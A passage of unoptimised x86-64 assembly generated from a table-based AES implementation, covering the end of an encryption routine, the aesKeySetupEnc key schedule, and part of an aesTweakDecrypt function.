xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -56(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -52(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -248(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -48(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -252(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -44(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -256(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -40(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -244(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -36(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -32(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, (%rax)
movl -244(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 1(%rax)
movl -244(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 2(%rax)
movl -244(%rbp), %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 3(%rax)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -28(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 4(%rax)
movl -248(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 5(%rax)
movl -248(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 6(%rax)
movl -248(%rbp), %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 7(%rax)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -24(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 8(%rax)
movl -252(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 9(%rax)
movl -252(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 10(%rax)
movl -252(%rbp), %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 11(%rax)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -20(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 12(%rax)
movl -256(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 13(%rax)
movl -256(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 14(%rax)
movl -256(%rbp), %eax
movb %al, %cl
movq -240(%rbp), %rax
movb %cl, 15(%rax)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
addq $272, %rsp ## imm = 0x110
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function aesKeySetupEnc
_aesKeySetupEnc: ## @aesKeySetupEnc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -20(%rbp)
movq -16(%rbp), %rax
movzbl (%rax), %ecx
shll $24, %ecx
movq -16(%rbp), %rax
movzbl 1(%rax), %eax
shll $16, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 2(%rax), %eax
shll $8, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 3(%rax), %eax
xorl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
movq -16(%rbp), %rax
movzbl 4(%rax), %ecx
shll $24, %ecx
movq -16(%rbp), %rax
movzbl 5(%rax), %eax
shll $16, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 6(%rax), %eax
shll $8, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 7(%rax), %eax
xorl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, 4(%rax)
movq -16(%rbp), %rax
movzbl 8(%rax), %ecx
shll $24, %ecx
movq -16(%rbp), %rax
movzbl 9(%rax), %eax
shll $16, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 10(%rax), %eax
shll $8, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 11(%rax), %eax
xorl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, 8(%rax)
movq -16(%rbp), %rax
movzbl 12(%rax), %ecx
shll $24, %ecx
movq -16(%rbp), %rax
movzbl 13(%rax), %eax
shll $16, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 14(%rax), %eax
shll $8, %eax
xorl %eax, %ecx
movq -16(%rbp), %rax
movzbl 15(%rax), %eax
xorl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, 12(%rax)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movl 12(%rax), %eax
movl %eax, -24(%rbp)
movq -8(%rbp), %rax
movl (%rax), %ecx
movl -24(%rbp), %eax
shrl $16, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
xorl %eax, %ecx
movl -24(%rbp), %eax
shrl $8, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $16711680, %eax ## imm = 0xFF0000
xorl %eax, %ecx
movl -24(%rbp), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $65280, %eax ## imm = 0xFF00
xorl %eax, %ecx
movl -24(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
xorl %eax, %ecx
movslq -20(%rbp), %rdx
leaq _rcon(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl %ecx, 16(%rax)
movq -8(%rbp), %rax
movl 4(%rax), %ecx
movq -8(%rbp), %rax
xorl 16(%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, 20(%rax)
movq -8(%rbp), %rax
movl 8(%rax), %ecx
movq -8(%rbp), %rax
xorl 20(%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, 24(%rax)
movq -8(%rbp), %rax
movl 12(%rax), %ecx
movq -8(%rbp), %rax
xorl 24(%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, 28(%rax)
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
cmpl $10, %eax
jne LBB1_3
## %bb.2:
movl $10, %eax
popq %rbp
retq
LBB1_3: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
addq $16, %rax
movq %rax, -8(%rbp)
jmp LBB1_1
.cfi_endproc
## -- End function
.globl _aesTweakDecrypt ## -- Begin function aesTweakDecrypt
.p2align 4, 0x90
_aesTweakDecrypt: ## @aesTweakDecrypt
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $288, %rsp ## imm = 0x120
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -232(%rbp)
movq %rsi, -240(%rbp)
movq %rdx, -248(%rbp)
movq %rcx, -256(%rbp)
leaq -192(%rbp), %rdi
movq -240(%rbp), %rsi
callq _aesKeySetupDec
movq -248(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -248(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -208(%rbp)
movq -248(%rbp), %rax
movzbl 2(%rax), %eax
shll $24, %eax
movq -248(%rbp), %rcx
movzbl 3(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -204(%rbp)
movq -248(%rbp), %rax
movzbl 4(%rax), %eax
shll $24, %eax
movq -248(%rbp), %rcx
movzbl 5(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -200(%rbp)
movq -248(%rbp), %rax
movzbl 6(%rax), %eax
shll $24, %eax
movq -248(%rbp), %rcx
movzbl 7(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -196(%rbp)
movl -208(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -208(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -208(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -208(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl %eax, -224(%rbp)
movl -204(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -204(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -204(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -204(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl %eax, -220(%rbp)
movl -200(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -200(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -200(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -200(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl %eax, -216(%rbp)
movl -196(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -196(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -196(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -196(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl %eax, -212(%rbp)
movq -232(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 2(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 3(%rcx), %ecx
xorl %ecx, %eax
xorl -192(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movq -232(%rbp), %rax
movzbl 4(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 5(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 6(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 7(%rcx), %ecx
xorl %ecx, %eax
xorl -188(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movq -232(%rbp), %rax
movzbl 8(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 9(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 10(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 11(%rcx), %ecx
xorl %ecx, %eax
xorl -184(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movq -232(%rbp), %rax
movzbl 12(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 13(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 14(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -232(%rbp), %rcx
movzbl 15(%rcx), %ecx
xorl %ecx, %eax
xorl -180(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -176(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -276(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -172(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -280(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -168(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -284(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -164(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -288(%rbp)
movl -276(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -288(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -160(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -260(%rbp)
movl -280(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -276(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -156(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -264(%rbp)
movl -284(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -280(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -152(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -268(%rbp)
movl -288(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -284(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
